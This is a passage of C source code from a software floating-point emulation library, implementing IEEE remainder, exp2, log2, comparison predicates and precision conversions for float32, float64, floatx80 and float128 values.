*----------------------------------------------------------------------------*/ float32 float32_rem(float32 a, float32 b, float_status *status) { flag aSign, zSign; int aExp, bExp, expDiff; uint32_t aSig, bSig; uint32_t q; uint64_t aSig64, bSig64, q64; uint32_t alternateASig; int32_t sigMean; a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); aSig = extractFloat32Frac( a ); aExp = extractFloat32Exp( a ); aSign = extractFloat32Sign( a ); bSig = extractFloat32Frac( b ); bExp = extractFloat32Exp( b ); if ( aExp == 0xFF ) { if ( aSig || ( ( bExp == 0xFF ) && bSig ) ) { return propagateFloat32NaN(a, b, status); } float_raise(float_flag_invalid, status); return float32_default_nan(status); } if ( bExp == 0xFF ) { if (bSig) { return propagateFloat32NaN(a, b, status); } return a; } if ( bExp == 0 ) { if ( bSig == 0 ) { float_raise(float_flag_invalid, status); return float32_default_nan(status); } normalizeFloat32Subnormal( bSig, &bExp, &bSig ); } if ( aExp == 0 ) { if ( aSig == 0 ) return a; normalizeFloat32Subnormal( aSig, &aExp, &aSig ); } expDiff = aExp - bExp; aSig |= 0x00800000; bSig |= 0x00800000; if ( expDiff < 32 ) { aSig <<= 8; bSig <<= 8; if ( expDiff < 0 ) { if ( expDiff < -1 ) return a; aSig >>= 1; } q = ( bSig <= aSig ); if ( q ) aSig -= bSig; if ( 0 < expDiff ) { q = ( ( (uint64_t) aSig )<<32 ) / bSig; q >>= 32 - expDiff; bSig >>= 2; aSig = ( ( aSig>>1 )<<( expDiff - 1 ) ) - bSig * q; } else { aSig >>= 2; bSig >>= 2; } } else { if ( bSig <= aSig ) aSig -= bSig; aSig64 = ( (uint64_t) aSig )<<40; bSig64 = ( (uint64_t) bSig )<<40; expDiff -= 64; while ( 0 < expDiff ) { q64 = estimateDiv128To64( aSig64, 0, bSig64 ); q64 = ( 2 < q64 ) ? q64 - 2 : 0; #ifdef _MSC_VER aSig64 = 0ULL - ( ( bSig * q64 )<<38 ); #else aSig64 = - ( ( bSig * q64 )<<38 ); #endif expDiff -= 62; } expDiff += 64; q64 = estimateDiv128To64( aSig64, 0, bSig64 ); q64 = ( 2 < q64 ) ? q64 - 2 : 0; q = q64>>( 64 - expDiff ); bSig <<= 6; aSig = ( ( aSig64>>33 )<<( expDiff - 1 ) ) - bSig * q; } do { alternateASig = aSig; ++q; aSig -= bSig; } while ( 0 <= (int32_t) aSig ); sigMean = aSig + alternateASig; if ( ( sigMean < 0 ) || ( ( sigMean == 0 ) && ( q & 1 ) ) ) { aSig = alternateASig; } zSign = ( (int32_t) aSig < 0 ); #ifdef _MSC_VER if ( zSign ) aSig = 0ULL - aSig; #else if ( zSign ) aSig = - aSig; #endif return normalizeRoundAndPackFloat32(aSign ^ zSign, bExp, aSig, status); } /*---------------------------------------------------------------------------- | Returns the binary exponential of the single-precision floating-point value | `a'. The operation is performed according to the IEC/IEEE Standard for | Binary Floating-Point Arithmetic. | | Uses the following identities: | | 1. ------------------------------------------------------------------------- | x x*ln(2) | 2 = e | | 2. ------------------------------------------------------------------------- | 2 3 4 5 n | x x x x x x x | e = 1 + --- + --- + --- + --- + --- + ... + --- + ... | 1! 2! 3! 4! 5! n! 
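| The implementation below evaluates the first 15 terms of this series in
| double precision - the table entries are the coefficients 1/n! as float64
| constants - and converts the accumulated sum back to single precision.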
*----------------------------------------------------------------------------*/ static const float64 float32_exp2_coefficients[15] = { const_float64( 0x3ff0000000000000ll ), /* 1 */ const_float64( 0x3fe0000000000000ll ), /* 2 */ const_float64( 0x3fc5555555555555ll ), /* 3 */ const_float64( 0x3fa5555555555555ll ), /* 4 */ const_float64( 0x3f81111111111111ll ), /* 5 */ const_float64( 0x3f56c16c16c16c17ll ), /* 6 */ const_float64( 0x3f2a01a01a01a01all ), /* 7 */ const_float64( 0x3efa01a01a01a01all ), /* 8 */ const_float64( 0x3ec71de3a556c734ll ), /* 9 */ const_float64( 0x3e927e4fb7789f5cll ), /* 10 */ const_float64( 0x3e5ae64567f544e4ll ), /* 11 */ const_float64( 0x3e21eed8eff8d898ll ), /* 12 */ const_float64( 0x3de6124613a86d09ll ), /* 13 */ const_float64( 0x3da93974a8c07c9dll ), /* 14 */ const_float64( 0x3d6ae7f3e733b81fll ), /* 15 */ }; float32 float32_exp2(float32 a, float_status *status) { flag aSign; int aExp; uint32_t aSig; float64 r, x, xn; int i; a = float32_squash_input_denormal(a, status); aSig = extractFloat32Frac( a ); aExp = extractFloat32Exp( a ); aSign = extractFloat32Sign( a ); if ( aExp == 0xFF) { if (aSig) { return propagateFloat32NaN(a, float32_zero, status); } return (aSign) ? float32_zero : a; } if (aExp == 0) { if (aSig == 0) return float32_one; } float_raise(float_flag_inexact, status); /* ******************************* */ /* using float64 for approximation */ /* ******************************* */ x = float32_to_float64(a, status); x = float64_mul(x, float64_ln2, status); xn = x; r = float64_one; for (i = 0 ; i < 15 ; i++) { float64 f; f = float64_mul(xn, float32_exp2_coefficients[i], status); r = float64_add(r, f, status); xn = float64_mul(xn, x, status); } return float64_to_float32(r, status); } /*---------------------------------------------------------------------------- | Returns the binary log of the single-precision floating-point value `a'. | The operation is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float32 float32_log2(float32 a, float_status *status) { flag aSign, zSign; int aExp; uint32_t aSig, zSig, i; a = float32_squash_input_denormal(a, status); aSig = extractFloat32Frac( a ); aExp = extractFloat32Exp( a ); aSign = extractFloat32Sign( a ); if ( aExp == 0 ) { if ( aSig == 0 ) return packFloat32( 1, 0xFF, 0 ); normalizeFloat32Subnormal( aSig, &aExp, &aSig ); } if ( aSign ) { float_raise(float_flag_invalid, status); return float32_default_nan(status); } if ( aExp == 0xFF ) { if (aSig) { return propagateFloat32NaN(a, float32_zero, status); } return a; } aExp -= 0x7F; aSig |= 0x00800000; zSign = aExp < 0; zSig = aExp << 23; for (i = 1 << 22; i > 0; i >>= 1) { aSig = ( (uint64_t)aSig * aSig ) >> 23; if ( aSig & 0x01000000 ) { aSig >>= 1; zSig |= i; } } if ( zSign ) #ifdef _MSC_VER zSig = 0 - zSig; #else zSig = -zSig; #endif return normalizeRoundAndPackFloat32(zSign, 0x85, zSig, status); } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is equal to | the corresponding value `b', and 0 otherwise. The invalid exception is | raised if either operand is a NaN. Otherwise, the comparison is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. 
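| (Illustrative note: the final test below treats zeroes of either sign as
| equal: when `av' and `bv' differ only in bit 31, ( ( av | bv )<<1 ) is 0,
| so float32_eq(+0, -0) returns 1.)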
*----------------------------------------------------------------------------*/ int float32_eq(float32 a, float32 b, float_status *status) { uint32_t av, bv; a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 0; } av = float32_val(a); bv = float32_val(b); return ( av == bv ) || ( (uint32_t) ( ( av | bv )<<1 ) == 0 ); } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is less than | or equal to the corresponding value `b', and 0 otherwise. The invalid | exception is raised if either operand is a NaN. The comparison is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float32_le(float32 a, float32 b, float_status *status) { flag aSign, bSign; uint32_t av, bv; a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 0; } aSign = extractFloat32Sign( a ); bSign = extractFloat32Sign( b ); av = float32_val(a); bv = float32_val(b); if ( aSign != bSign ) return aSign || ( (uint32_t) ( ( av | bv )<<1 ) == 0 ); return ( av == bv ) || ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is less than | the corresponding value `b', and 0 otherwise. The invalid exception is | raised if either operand is a NaN. The comparison is performed according | to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float32_lt(float32 a, float32 b, float_status *status) { flag aSign, bSign; uint32_t av, bv; a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 0; } aSign = extractFloat32Sign( a ); bSign = extractFloat32Sign( b ); av = float32_val(a); bv = float32_val(b); if ( aSign != bSign ) return aSign && ( (uint32_t) ( ( av | bv )<<1 ) != 0 ); return ( av != bv ) && ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point values `a' and `b' cannot | be compared, and 0 otherwise. The invalid exception is raised if either | operand is a NaN. The comparison is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. 
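| (Illustrative note: this predicate is true exactly when at least one
| operand is a NaN, making it the complement of the ordered eq/lt/gt
| outcomes.)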
*----------------------------------------------------------------------------*/ int float32_unordered(float32 a, float32 b, float_status *status) { a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 1; } return 0; } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is equal to | the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an | exception. The comparison is performed according to the IEC/IEEE Standard | for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float32_eq_quiet(float32 a, float32 b, float_status *status) { a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { if (float32_is_signaling_nan(a, status) || float32_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } return ( float32_val(a) == float32_val(b) ) || ( (uint32_t) ( ( float32_val(a) | float32_val(b) )<<1 ) == 0 ); } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is less than or | equal to the corresponding value `b', and 0 otherwise. Quiet NaNs do not | cause an exception. Otherwise, the comparison is performed according to the | IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float32_le_quiet(float32 a, float32 b, float_status *status) { flag aSign, bSign; uint32_t av, bv; a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { if (float32_is_signaling_nan(a, status) || float32_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } aSign = extractFloat32Sign( a ); bSign = extractFloat32Sign( b ); av = float32_val(a); bv = float32_val(b); if ( aSign != bSign ) return aSign || ( (uint32_t) ( ( av | bv )<<1 ) == 0 ); return ( av == bv ) || ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point value `a' is less than | the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an | exception. Otherwise, the comparison is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. 
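| (Illustrative note: as with the other quiet predicates, a signaling NaN
| operand still raises the invalid exception, but any NaN operand simply
| makes the predicate return 0.)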
*----------------------------------------------------------------------------*/ int float32_lt_quiet(float32 a, float32 b, float_status *status) { flag aSign, bSign; uint32_t av, bv; a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { if (float32_is_signaling_nan(a, status) || float32_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } aSign = extractFloat32Sign( a ); bSign = extractFloat32Sign( b ); av = float32_val(a); bv = float32_val(b); if ( aSign != bSign ) return aSign && ( (uint32_t) ( ( av | bv )<<1 ) != 0 ); return ( av != bv ) && ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the single-precision floating-point values `a' and `b' cannot | be compared, and 0 otherwise. Quiet NaNs do not cause an exception. The | comparison is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float32_unordered_quiet(float32 a, float32 b, float_status *status) { a = float32_squash_input_denormal(a, status); b = float32_squash_input_denormal(b, status); if ( ( ( extractFloat32Exp( a ) == 0xFF ) && extractFloat32Frac( a ) ) || ( ( extractFloat32Exp( b ) == 0xFF ) && extractFloat32Frac( b ) ) ) { if (float32_is_signaling_nan(a, status) || float32_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 1; } return 0; } /*---------------------------------------------------------------------------- | Returns the result of converting the double-precision floating-point value | `a' to the extended double-precision floating-point format. The conversion | is performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic. *----------------------------------------------------------------------------*/ floatx80 float64_to_floatx80(float64 a, float_status *status) { flag aSign; int aExp; uint64_t aSig; a = float64_squash_input_denormal(a, status); aSig = extractFloat64Frac( a ); aExp = extractFloat64Exp( a ); aSign = extractFloat64Sign( a ); if ( aExp == 0x7FF ) { if (aSig) { return commonNaNToFloatx80(float64ToCommonNaN(a, status), status); } return packFloatx80(aSign, floatx80_infinity_high, floatx80_infinity_low); } if ( aExp == 0 ) { if ( aSig == 0 ) return packFloatx80( aSign, 0, 0 ); normalizeFloat64Subnormal( aSig, &aExp, &aSig ); } return packFloatx80( aSign, aExp + 0x3C00, (aSig | UINT64_C(0x0010000000000000)) << 11); } /*---------------------------------------------------------------------------- | Returns the result of converting the double-precision floating-point value | `a' to the quadruple-precision floating-point format. The conversion is | performed according to the IEC/IEEE Standard for Binary Floating-Point | Arithmetic. 
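| (Illustrative note: this widening is exact: the exponent is rebiased by
| 0x3C00 = 0x3FFF - 0x3FF and the 52 fraction bits are shifted right by 4
| into the 48-bit high fragment, the displaced bits landing at the top of
| the low fragment, so no rounding occurs.)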
*----------------------------------------------------------------------------*/ float128 float64_to_float128(float64 a, float_status *status) { flag aSign; int aExp; uint64_t aSig, zSig0, zSig1; a = float64_squash_input_denormal(a, status); aSig = extractFloat64Frac( a ); aExp = extractFloat64Exp( a ); aSign = extractFloat64Sign( a ); if ( aExp == 0x7FF ) { if (aSig) { return commonNaNToFloat128(float64ToCommonNaN(a, status), status); } return packFloat128( aSign, 0x7FFF, 0, 0 ); } if ( aExp == 0 ) { if ( aSig == 0 ) return packFloat128( aSign, 0, 0, 0 ); normalizeFloat64Subnormal( aSig, &aExp, &aSig ); --aExp; } shift128Right( aSig, 0, 4, &zSig0, &zSig1 ); return packFloat128( aSign, aExp + 0x3C00, zSig0, zSig1 ); } /*---------------------------------------------------------------------------- | Returns the remainder of the double-precision floating-point value `a' | with respect to the corresponding value `b'. The operation is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ float64 float64_rem(float64 a, float64 b, float_status *status) { flag aSign, zSign; int aExp, bExp, expDiff; uint64_t aSig, bSig; uint64_t q, alternateASig; int64_t sigMean; a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); aSig = extractFloat64Frac( a ); aExp = extractFloat64Exp( a ); aSign = extractFloat64Sign( a ); bSig = extractFloat64Frac( b ); bExp = extractFloat64Exp( b ); if ( aExp == 0x7FF ) { if ( aSig || ( ( bExp == 0x7FF ) && bSig ) ) { return propagateFloat64NaN(a, b, status); } float_raise(float_flag_invalid, status); return float64_default_nan(status); } if ( bExp == 0x7FF ) { if (bSig) { return propagateFloat64NaN(a, b, status); } return a; } if ( bExp == 0 ) { if ( bSig == 0 ) { float_raise(float_flag_invalid, status); return float64_default_nan(status); } normalizeFloat64Subnormal( bSig, &bExp, &bSig ); } if ( aExp == 0 ) { if ( aSig == 0 ) return a; normalizeFloat64Subnormal( aSig, &aExp, &aSig ); } expDiff = aExp - bExp; aSig = (aSig | UINT64_C(0x0010000000000000)) << 11; bSig = (bSig | UINT64_C(0x0010000000000000)) << 11; if ( expDiff < 0 ) { if ( expDiff < -1 ) return a; aSig >>= 1; } q = ( bSig <= aSig ); if ( q ) aSig -= bSig; expDiff -= 64; while ( 0 < expDiff ) { q = estimateDiv128To64( aSig, 0, bSig ); q = ( 2 < q ) ? q - 2 : 0; #ifdef _MSC_VER aSig = 0ULL - ( ( bSig>>2 ) * q ); #else aSig = - ( ( bSig>>2 ) * q ); #endif expDiff -= 62; } expDiff += 64; if ( 0 < expDiff ) { q = estimateDiv128To64( aSig, 0, bSig ); q = ( 2 < q ) ? q - 2 : 0; q >>= 64 - expDiff; bSig >>= 2; aSig = ( ( aSig>>1 )<<( expDiff - 1 ) ) - bSig * q; } else { aSig >>= 2; bSig >>= 2; } do { alternateASig = aSig; ++q; aSig -= bSig; } while ( 0 <= (int64_t) aSig ); sigMean = aSig + alternateASig; if ( ( sigMean < 0 ) || ( ( sigMean == 0 ) && ( q & 1 ) ) ) { aSig = alternateASig; } zSign = ( (int64_t) aSig < 0 ); #ifdef _MSC_VER if ( zSign ) aSig = 0 - aSig; #else if ( zSign ) aSig = - aSig; #endif return normalizeRoundAndPackFloat64(aSign ^ zSign, bExp, aSig, status); } /*---------------------------------------------------------------------------- | Returns the binary log of the double-precision floating-point value `a'. | The operation is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. 
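| (Illustrative note: the integer part of the result comes from the unbiased
| exponent; fraction bits are then generated one at a time by squaring the
| significand and testing whether it reached [2, 4). For instance,
| float64_log2(8.0) yields exactly 3.0.)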
*----------------------------------------------------------------------------*/ float64 float64_log2(float64 a, float_status *status) { flag aSign, zSign; int aExp; uint64_t aSig, aSig0, aSig1, zSig, i; a = float64_squash_input_denormal(a, status); aSig = extractFloat64Frac( a ); aExp = extractFloat64Exp( a ); aSign = extractFloat64Sign( a ); if ( aExp == 0 ) { if ( aSig == 0 ) return packFloat64( 1, 0x7FF, 0 ); normalizeFloat64Subnormal( aSig, &aExp, &aSig ); } if ( aSign ) { float_raise(float_flag_invalid, status); return float64_default_nan(status); } if ( aExp == 0x7FF ) { if (aSig) { return propagateFloat64NaN(a, float64_zero, status); } return a; } aExp -= 0x3FF; aSig |= UINT64_C(0x0010000000000000); zSign = aExp < 0; zSig = (uint64_t)aExp << 52; for (i = 1LL << 51; i > 0; i >>= 1) { mul64To128( aSig, aSig, &aSig0, &aSig1 ); aSig = ( aSig0 << 12 ) | ( aSig1 >> 52 ); if ( aSig & UINT64_C(0x0020000000000000) ) { aSig >>= 1; zSig |= i; } } if ( zSign ) #ifdef _MSC_VER zSig = 0 - zSig; #else zSig = -zSig; #endif return normalizeRoundAndPackFloat64(zSign, 0x408, zSig, status); } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is equal to the | corresponding value `b', and 0 otherwise. The invalid exception is raised | if either operand is a NaN. Otherwise, the comparison is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float64_eq(float64 a, float64 b, float_status *status) { uint64_t av, bv; a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 0; } av = float64_val(a); bv = float64_val(b); return ( av == bv ) || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is less than or | equal to the corresponding value `b', and 0 otherwise. The invalid | exception is raised if either operand is a NaN. The comparison is performed | according to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float64_le(float64 a, float64 b, float_status *status) { flag aSign, bSign; uint64_t av, bv; a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 0; } aSign = extractFloat64Sign( a ); bSign = extractFloat64Sign( b ); av = float64_val(a); bv = float64_val(b); if ( aSign != bSign ) return aSign || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); return ( av == bv ) || ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is less than | the corresponding value `b', and 0 otherwise. The invalid exception is | raised if either operand is a NaN. The comparison is performed according | to the IEC/IEEE Standard for Binary Floating-Point Arithmetic. 
*----------------------------------------------------------------------------*/ int float64_lt(float64 a, float64 b, float_status *status) { flag aSign, bSign; uint64_t av, bv; a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 0; } aSign = extractFloat64Sign( a ); bSign = extractFloat64Sign( b ); av = float64_val(a); bv = float64_val(b); if ( aSign != bSign ) return aSign && ( (uint64_t) ( ( av | bv )<<1 ) != 0 ); return ( av != bv ) && ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point values `a' and `b' cannot | be compared, and 0 otherwise. The invalid exception is raised if either | operand is a NaN. The comparison is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float64_unordered(float64 a, float64 b, float_status *status) { a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { float_raise(float_flag_invalid, status); return 1; } return 0; } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is equal to the | corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an | exception. The comparison is performed according to the IEC/IEEE Standard | for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float64_eq_quiet(float64 a, float64 b, float_status *status) { uint64_t av, bv; a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { if (float64_is_signaling_nan(a, status) || float64_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } av = float64_val(a); bv = float64_val(b); return ( av == bv ) || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is less than or | equal to the corresponding value `b', and 0 otherwise. Quiet NaNs do not | cause an exception. Otherwise, the comparison is performed according to the | IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/ int float64_le_quiet(float64 a, float64 b, float_status *status) { flag aSign, bSign; uint64_t av, bv; a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { if (float64_is_signaling_nan(a, status) || float64_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } aSign = extractFloat64Sign( a ); bSign = extractFloat64Sign( b ); av = float64_val(a); bv = float64_val(b); if ( aSign != bSign ) return aSign || ( (uint64_t) ( ( av | bv )<<1 ) == 0 ); return ( av == bv ) || ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point value `a' is less than | the corresponding value `b', and 0 otherwise. Quiet NaNs do not cause an | exception. Otherwise, the comparison is performed according to the IEC/IEEE | Standard for Binary Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float64_lt_quiet(float64 a, float64 b, float_status *status) { flag aSign, bSign; uint64_t av, bv; a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { if (float64_is_signaling_nan(a, status) || float64_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 0; } aSign = extractFloat64Sign( a ); bSign = extractFloat64Sign( b ); av = float64_val(a); bv = float64_val(b); if ( aSign != bSign ) return aSign && ( (uint64_t) ( ( av | bv )<<1 ) != 0 ); return ( av != bv ) && ( aSign ^ ( av < bv ) ); } /*---------------------------------------------------------------------------- | Returns 1 if the double-precision floating-point values `a' and `b' cannot | be compared, and 0 otherwise. Quiet NaNs do not cause an exception. The | comparison is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic. *----------------------------------------------------------------------------*/ int float64_unordered_quiet(float64 a, float64 b, float_status *status) { a = float64_squash_input_denormal(a, status); b = float64_squash_input_denormal(b, status); if ( ( ( extractFloat64Exp( a ) == 0x7FF ) && extractFloat64Frac( a ) ) || ( ( extractFloat64Exp( b ) == 0x7FF ) && extractFloat64Frac( b ) ) ) { if (float64_is_signaling_nan(a, status) || float64_is_signaling_nan(b, status)) { float_raise(float_flag_invalid, status); } return 1; } return 0; } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point value `a' to the 32-bit two's complement integer format. The | conversion is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic---which means in particular that the conversion | is rounded according to the current rounding mode. If `a' is a NaN, the | largest positive integer is returned. Otherwise, if the conversion | overflows, the largest integer with the same sign as `a' is returned. 
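| (Illustrative note: an invalid extended-precision encoding - a nonzero
| exponent with the explicit integer bit clear - raises the invalid
| exception and returns 1 << 31 before any rounding is attempted.)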
*----------------------------------------------------------------------------*/ int32_t floatx80_to_int32(floatx80 a, float_status *status) { flag aSign; int32_t aExp, shiftCount; uint64_t aSig; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return 1 << 31; } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); if ( ( aExp == 0x7FFF ) && (uint64_t) ( aSig<<1 ) ) aSign = 0; shiftCount = 0x4037 - aExp; if ( shiftCount <= 0 ) shiftCount = 1; shift64RightJamming( aSig, shiftCount, &aSig ); return roundAndPackInt32(aSign, aSig, status); } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point value `a' to the 32-bit two's complement integer format. The | conversion is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic, except that the conversion is always rounded | toward zero. If `a' is a NaN, the largest positive integer is returned. | Otherwise, if the conversion overflows, the largest integer with the same | sign as `a' is returned. *----------------------------------------------------------------------------*/ int32_t floatx80_to_int32_round_to_zero(floatx80 a, float_status *status) { flag aSign; int32_t aExp, shiftCount; uint64_t aSig, savedASig; int32_t z; if (floatx80_invalid_encoding(a)) { float_raise(float_flag_invalid, status); return 1 << 31; } aSig = extractFloatx80Frac( a ); aExp = extractFloatx80Exp( a ); aSign = extractFloatx80Sign( a ); if ( 0x401E < aExp ) { if ( ( aExp == 0x7FFF ) && (uint64_t) ( aSig<<1 ) ) aSign = 0; goto invalid; } else if ( aExp < 0x3FFF ) { if (aExp || aSig) { status->float_exception_flags |= float_flag_inexact; } return 0; } shiftCount = 0x403E - aExp; savedASig = aSig; aSig >>= shiftCount; z = aSig; if ( aSign ) z = - z; if ( ( z < 0 ) ^ aSign ) { invalid: float_raise(float_flag_invalid, status); return aSign ? (int32_t) 0x80000000 : 0x7FFFFFFF; } if ( ( aSig<<shiftCount ) != savedASig ) { status->float_exception_flags |= float_flag_inexact; } return z; } /*---------------------------------------------------------------------------- | Returns the result of converting the extended double-precision floating- | point value `a' to the 64-bit two's complement integer format. The | conversion is performed according to the IEC/IEEE Standard for Binary | Floating-Point Arithmetic---which means in particular that the conversion | is rounded according to the current rounding mode. If `a' is a NaN, | the largest positive integer is returned. Otherwise, if the conversion | overflows, the largest integer with the same sign as `a' is returned. 
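| (Illustrative note: exponents above 0x403E always overflow; at 0x403E the
| significand is already an integer and is passed through unshifted, so
| roundAndPackInt64 decides representability - of the values at that
| magnitude only -2^63 fits in an int64_t.)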
